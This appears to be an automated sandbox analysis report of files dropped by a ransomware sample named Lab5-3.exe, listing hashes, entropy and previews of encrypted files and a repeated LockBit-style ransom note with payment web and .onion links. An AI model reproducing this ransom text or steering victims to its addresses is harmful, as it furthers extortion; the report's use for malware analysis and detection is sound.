                                                                                                          Preview:._p.PW./....^A.......Z!...f..aF...(...uy..zP..........`.B.....+.#.{3....*!...S9|.g....#z.....4.f.=..n.wL. ngkp..3....J!..;.qO.!.|...8.p_..H...l..{].&.UnT.i....nE.s*.R.`.V<?rF5Y..&.S.a(..I.4.C....%...c3>..e..r..KF.~..d5-/....&=.R..."..v.......V..z#'Vf6.D.....$..kR...........$J.......{...@..C..A,E...I.......{..L..I.SZ^g.bp.z...........JEm,.I.4jS...gS..N&.)w....P?.......oy..:....A...@...YuV ...\o...y...h......b8!...f.{'&..."Q....[..<.p.....`{F..O.........D..vD..^=...r.}q.@>TS.....Uy....X#9.2.]..u.....-@Q'..A.._..cT).R...)wB....O@.,G(...[...b.....!..5.Ni!.\...^o6..-....@....sG.n......3..e,c..o.......N.......8>.....tqa...L...)...."P..u"F.....v...O,.9<.U....d.o. ...-"..G!i.B*..H..$Q."..u....9.Q$.wj.#.)x.O...x..;..Iv..r...#.d"..|...2.U...hi...A.pg.R.<u....U.j._M.l........n]K0u.C+j..V..6c.I.{...2P.wX..R..mVvk.....z....m..d..'./&..b...'Y..U...........a7.R.;..d.!...>.Se....5.cyp.!~......)qm..t.^...? ..R@._...........Z..:.8|..d..hg..{.....J
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17888
                                                                                                          Entropy (8bit):7.989564553896519
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:8qvWCexpEaAH5Yt0eRKH5A9D1X7PFWa1aGJrWkNGzRWG1MNtb:dvWhcHQ1KH5SDxdWAaGJr1NGlWGmNZ
                                                                                                          MD5:A72FC3439E895FC195C8FE41ED6A5259
                                                                                                          SHA1:585E5411995991AA31045CD030730B80511F024D
                                                                                                          SHA-256:CA36885341348DA7D1371B7B455D761D3A8A835A75757708808B4DE7769F2AA9
                                                                                                          SHA-512:D56515BC2BA59137BA397C8ABE08573088D20BF6D5AA775C496416235A5C03ABE5F866BBE65010575ECCC83F67B9B5C562307DC5922D87A3D9474A07E6E1E74B
                                                                                                          Malicious:false
                                                                                                          Preview:......'.G/...|K(U.c....5o.>.`.!:..2........UjmUM....>{..7E7........jh.......+J.' ..0.r......h..da3..'{..j.o..oE..alI/...lU.|z..u.Fn[[.FZn.:a.W.g.{l@G@.M^}.bs....s......4ll.[..ND....(.....|.s...=....d<3...0>.^...^5q..c.d.....J.R.......B..k\^...T.x4a.7.....g.s...O.$.Bp.b.......!.%.U.5H...,3..P".C..#.\.........|_..D....W..&S....].%.....f...^...\)..)n+w...#h.(....K....}.y.h...q..e...Yk...n/.2.gGj....]e...EN.b3.N0..#...|.8)..a..hz:......L...V0....Y..P.........Cb.....H..g..j.vu#:....gH...M..I...%........;g....'.@..n..vy.[..z.pr......M.>.k...&.<......B.K..I:l.~.....^+..K.O.{.)..H.-.k..6...;....)_hE...#..?v.?.....r....&..;..-..`...s..].(..e..u..L%#h.x...kVa.T..l........C....+C..W..j..b.:<.X..1..a.O.....jG"..8.2..p.W...J'.;..Y.Jw..`.mR..ECF0...3"%,.r!x.#...4.S^.Z.....(.h...;$...&."....w7...`rC+..a...G...h..R..P..Vj..U......./\...L.....?..J...$.......|..SXK...`|(.H.....WOd)...t....i..RDZ........f66.l...Ft3.wP.NS8........a9....T5FQx.....)N...`..)...&..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16208
                                                                                                          Entropy (8bit):7.9885032109763285
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:wtzWV/raeVft7vGqGggW8TuX68fjVWd35NKc0FCKTttb:weue1t7ObHspAd3X+FCqtZ
                                                                                                          MD5:FE059246B017131057EF1650209A6C80
                                                                                                          SHA1:AE72203C5BB590C7FB75785430DCF0596F66A55C
                                                                                                          SHA-256:84596C5212C8EFC4D340A3150240BBEB859C430EBE9B46618BA607B6261E493A
                                                                                                          SHA-512:BFDE5D855AE657D629B890FCC685C4DA597ED8B7B60442BF33FF2F386E79DF770A0ACF34F39DE37BF821A0590B3D05C1299DEC9C8FA84F20E5A59E39178D7162
                                                                                                          Malicious:false
                                                                                                          Preview:v..R.W..S(..P.t.W+..Q...Y...lBa.Us9L(.#F.+.@ >..>.;....".?.)f...-..k...+\.e..k@...Z.5O9[........R.j.K.q..>z.`.{...8...^Z...$.Q.G....A<,!.~j..2 K..X.=.[.E.}.5...O...I..H2{....l1?..".M....U....`E.Y.\*.Y..`....#r....o...,gm..J.N.V&.b7.?a....T.y....!...,..-^....o..2.P.QC...;u.#.....[.d.>\..Y..Ky..Z.f. .tM./..X..~..X...@.:~.'2*n_..q[..w...D.O..d6....=.i.r...c..,.7....C.A....R0....[...3.K.e..........v..M...f..........[.I>E....4|.c...l.....a'........r.kw.H....H.J.E..a..p.%..o{l*....W.v.].q!x....^[.j .k..*..'......h.I.F.Q.6Q.e0cLb../....|.9.1.6...L>(P..".O ....M..E....V.R".2...&.."...E....".C.1...c......+.oNJ3.a...`.P6..#\M.1d .....0Z.n._j.ft..w....=....!NI..9AF..*..t.`._<.YG...2..O.3...T..f..q..g.<.Kl2...Kg0.P..I"..<.&.F.67.......W.._...e.....6.&...$nR...... .^...3.$..A.}.k.t.eDr2&h#BA*.!U..%.sy..<.'.....f.A.L..-$...K..#..j.....3.6T.A.j'. .Bo?..Q>K..V}.T.......%..h.=.n..:.%...c.$fN.........[..R....CjrNL.....i...!...6..3.l...jD.@E..-U.{..t.=.>.uS.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17600
                                                                                                          Entropy (8bit):7.988261028431549
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:yQJVwWc7FQPjCNo8vIe3AtmssszkLam/cAe0aLHg1IuZ2LWh6XRAU/Ktb:yQkWc8MoEI4AtIfH0Ae09IuZehAAKZ
                                                                                                          MD5:4E00672B56B1373A02B4811F3C13B9BE
                                                                                                          SHA1:FB4A889C609C860C555FD8F3D1E0D708697ECFAF
                                                                                                          SHA-256:E187CDC0FC85525E2E3C2C73CF3383780434BA81D0E5DDD4D8D4C86513688E6D
                                                                                                          SHA-512:1B2A120EC8C19102B45DBDC30F9F6768CC519537269A6A1DF740F7E6CB78DE74E52E92EF3A93EA1220562032D97060E842F378E047E314F75DBBC273C9C83E85
                                                                                                          Malicious:false
                                                                                                          Preview:.....CF.H.Z_.*(.L.D..#yr..+'3)..^&.m...I m$.....Mv!.#LV.....O8.q..Ua..#....]...R..wE.w......U..y.]......V..dhs..*4.c.._..Z...2\6sm".H.ow7h...Z....S......Y...x.(.....S2\.-.eh_.N.R..g]^.+..{I.....a.>.~.....K..J\R/.4`S.e......6.L.X!..h.......e~.c...%.mi.Ybw.......Y..]..H.E.......7..[.J>.\N]^.^u.....(....sk.aXt...g.m.:.....h...6.`..3.&.g .r9%.A..y..S...U.k.....m.h...%..7...r..n,^..oG....K.._...?..*.~....{.......z...". .....|;..a.P"...U.8.;.zP......j.....ag.._.7...?.k.!.....n..z..'..P.....^.4....A.A..q..u...Oa:.=.....<.....]..]......\$D.q.. .u+.^l\5.....-.....~..7+...@..()Z....d..>......C.._f.-%..vw3..`......./m`.....>....eh..I...!.zTpn......7.2...f.j..a<.m..\.I(y...P..5`..T.....D...v$...D.%.....x.......N...f..~.c..u....C...Xk..q_.:.?e.o...r..W;^.........Y.`.2...$...^[....!`.....V...B[M.y/s....../q.h..Y........;..K.t.........r..o4.|..e.f"...qo..............R}X.)9n...G....._..j..9.c.c..5D.N...{.U..48O(_..7.rm..y$.U.N.?....a.@...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17392
                                                                                                          Entropy (8bit):7.991353276445609
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:gpnSQDhj8Ym2i56Z7SP258fqAuvCJpPk6LrIWvfqGUipc4l8tb:MT9ZZFz580EpPkaIExUi2ZZ
                                                                                                          MD5:77D299BCC60CE5AC5F91E7B1C157767B
                                                                                                          SHA1:8844102BBB765598111DB25E27986F6CF2E7C50E
                                                                                                          SHA-256:2843A11DB7C08FDB9C1CA400D3C926AE42416DDC99B8F7D922A0CFEAEAF1BCE9
                                                                                                          SHA-512:295B99B5E87B98E835993271C9ED69D2CE31C743B7BDC29BF5335601367F4A5A26DFCBFB73D84773EDCDC1DB7D8124C2437F290CC61B4C10DA0854FFAF7F1577
                                                                                                          Malicious:true
                                                                                                          Preview:QE@m.@Kd.vd~J6.....fDh..........gX..B?f..]~......TiF.*;...(4^]0..W.{!.\o....-...!.5.....|=x.y..,yk.=>".?.........;:X.&....Z.1.........V".z./.HTU...6o.4..[7.....l(%.....q..c:.m/.E...n/c...&..C&.. _#.m.....I.!..B...XM|.g[W^kj.e....+..8Pi...[..A.....^!.8>X'M_..........2..KQ..2.jZ.....[.D..v.&.6.>.@.S..W../.....~5....F..l..~.... .....=.!,..]!.......l!.!......*....AVL....eL.b.~..7..1....{<...A.+....@m....^......'[.f{.j.:d..T.&.8F2.a...<.....\i......S..Qr..%.s.:.a.C.F...\`..m..6. ....^".K.\.j>`.u.Yzb...1C...0....f.fm_.../W#3Yb._'l....]6.D..*...."._.6.*..yIlE."=....dB.3....6.P...K =..WS0.f......,d#.......rj....l.\..J....R.#I.hY...I..fz.3.......b..}:T&.I.&.f$.A..o_/(5>.........rp#..l..lI...+....{.0t..1....*0.*.....Q........bS7..hOl..R1....+S;#be....WKL.?..g.=7...~9.HB.F.e.$..g.(..Cu@].e<g.....67...@.D.r2....,.|.J.F4P.u.x.7...G....w>.i.^..$...f.P.'..T...8....V.;.$.....t..8&}&9;.......;s.[TE..^.........N.0...q./.........kn....l.....p.7]a ..Z.b`! ..?.4.H7..Z
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17248
                                                                                                          Entropy (8bit):7.9896839886371325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:DTdA+zk+1aAXpyxzRkHEnLAjTKlEuvFtb:DKb+cAXpytr8HK5vFZ
                                                                                                          MD5:350651DA96ED3ABCBD29F87B94859FFD
                                                                                                          SHA1:EC612F26DE1D53B2C9A230A33AB25C9697F95D68
                                                                                                          SHA-256:4FA590274D954FAD44C99EB2251F9A1291FEED72916E269C8BAE7D014B7DB65E
                                                                                                          SHA-512:5F8E26E20145C5BC74098B6BFBEF63120FA2DD2793B1268665957FAB88407DFC0A9C9089B45C2B252DC789597DDDAB18649DE3E0CD4CB7BA8C1163FBDE2BA42B
                                                                                                          Malicious:false
                                                                                                          Preview:.U.9..{.........$:&..n....M..?.Z...F.B.....$..x..Dx`|..X.0A).$N..0..5...NL.......37Am..q...,.~0$7.]+...dw~.....F..`A,...N.......0...W1...RA.+l...-..RS..M+W....5...(/..i.......,(hQ...W~."..`......M..] i.n.2..1............)...(..k..."*9..7r.. ..wF..K....... ...(...'.../_aE..../...I..K.?!'.....FLu....r..V.pC/.!b......5....>.tby.>.b..9v.......;...7.].R....[..6.`69..hw..6......l.P..!1.mb.........x.....uWU.*.FB.y.o]...=.w..Awzk.[..l.....6[.3.......].......w....tl.....].i.3J...4.~.Vx&..t..i.......4.h.......8.U?*5.<..k..z..-..m..8e.u....a.A.LWE.tM.%...L...r5..o....q........0..@.._.(.XM.a..^?.8...q.1EwK.d5(/......).5..C..9....D03.TwV..%...Y.d.'.W.......Z.....g..2..c..%..".!.q.A......`.._.`.......c .T(...F"Z|......U........)Aa.l^W...A......AX....v...8v.........U..!.m;...,.|Fq.LN$..{]]=I....X......]Y..../W.......^..m.uX...g.>..;^...^........m....w..H..}..UbJ..1........s..%.Kc..<.>$b5.,E.:N.......N.e..<Qgce..BY..M.&.0>.7...9....$...=....9m.?.....j*
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17664
                                                                                                          Entropy (8bit):7.990317382038805
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:VBz1iO5Xko06jveED9B1AdnNd8VWPDT5OpGtb:VBEQ0ijb+nsVWrlOkZ
                                                                                                          MD5:4A2A2414C0EE4573BFDB4D245E401B9F
                                                                                                          SHA1:12ED6264C9BD75F34D433CF61AD302C915F9C21E
                                                                                                          SHA-256:EB7D403666C11D5FF172A4330BBC3D87C03B65B9601FD36609237CA7DC60C364
                                                                                                          SHA-512:F7D8456FAA741BCE366113C3A14640BB5047E5A7B3A16C903D94B6B760AE5E57A8E46C2F425108DFBAB051440967372C9C33AA5B124DF7A89D55EC98F5523591
                                                                                                          Malicious:true
                                                                                                          Preview:.}A.zr)~...'_....x..6...4....H..oV&..P.....'...WSR.......N.\..d..I........g..<....Q...;2Ffu4z..<adl>"...@.(.i..;..)...V...1e...."-...WtrT#.t.......*46......H5...%.....]...n..."%.2`..|.(^.....L7.q.jq..(....b..&I..tF\....)...K.....M..Ew.._...`...c..O....d.Oe,-./V..d$.2/M.LI..}{.1z...;Ujd.?...~^Cb...W.....?........sM.b1.?......KU..?...8.W7.<W.1.B.Z.Z..8x....##!4..u.j..x.1...J..b;.rg....g..-.8.z.6.%...|. ....]...&V._+.o3.7r.L.jsd.....]1.p.......FmA......y..;?bF......tb4.r..w..:od>.Z..%.....'1.N..QF....cQts...../n?si...*l.A..B.V..............Zs`!..n..^R/.8^...tP...O...HO.C..M..6'G.n&R........&H....&...J.J,..W..Q.....@5.....}....Tm.J..S...*b...?.....]...#4...!.....3}J..V.....H..nx.wm..7".I.2..:.,..: Up.K....^~.`8.Iv.E.v{...e.r.!.iTv.q.....\...E.j4.....A.F.G..dL.xkI....8.b...C=_...N..._X....<.y.MDSI.R.N.3....O.<...x.8.Z|.....7...z..%/..8...6. ...#..P.4.v.xL.l-.....7...[..C... r...m...o.\.a.#^v.X...i.x9'.:1.,...s2&.%.-.~E....cN.xy.:.y..+Tk'8.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15808
                                                                                                          Entropy (8bit):7.988784991971694
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Q91Igr6ScdsAz8BYXl2uyjwZCCOHF4zzSue4kgxdtb:c1R+VdR46yjwg/l4b5xdZ
                                                                                                          MD5:4D030EB636627792F2CBA57E8C8A9134
                                                                                                          SHA1:FD1A4C47CF411AAA2108362D07AB738F83CF61D9
                                                                                                          SHA-256:ABEE4D6E9DC889B251DFC4ABBBD223D62FFD963D1496574A168053C72797B7ED
                                                                                                          SHA-512:138F909666FFFCAA8E2F3C9CB77B6BD2EE992C838EB2C403525FA43A449521FB36A05E23BC0A1C74898162F25583715D9859B4617F075128456F653A3EC5FC43
                                                                                                          Malicious:false
                                                                                                          Preview:...0.64....,.O.2|@^..5......UA.......F,;FenD..k..an....l-_.+A`....<..n7'...|....|.DO.q....5._.!..~....I...`..p.....L..o.oa.*...g.^.M...S..b..|...y..Z5.P.-..C.u.Z..;.dq.%..in.&.....8.Ss.mp.|CL*...G%..Ly.b)....e.j.........Q.`..j.w.......ow....`..;.;.^...U..X....x|.p.......o-...$;..=....n.|R..j3j..R.+.D.V.rMw_.#...../p..Q.?s..sa.}.......s..@.,.C..Tx.U@<,$\.I."5.%.2.t.o...5...y.4..(...~ .{....&...>.....%.!.J..s8.L.".ZC...q..'n..).G.dY...V..U...w[...`...N{.......b/.^...uJ.z[..".w@...%v.6..I.@.s.Hvv..0..L.....g.m..:..}]..g:..b.....l%I.l.g^..9m.0....2dH..F..s...M..0qJ1r8....*?..!....|.J..':k.........K.W...:5m../9.[....#.$..43.v.5..Mn..J..A..q,qk...X.......>.0......)[~....?8].CU.K:s....w...:..0S.|~i.q..;...T..F....wy..\"2.S.)..j..8.\.O.*VW...P=y~.. {....4.hq..T.5n3o.<.f.q5.3.z.b./.('.....WT .S..*o^T3......'.......Bq....``..V.`l.L.S...m..:,..V.h...^.."..8M.....A....9...P..eQ......6...6t..Z...m....Su.....{.O*.[.7...z.m9.wj.OL.8........BN.Yx.M.#. _.UcUM5
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
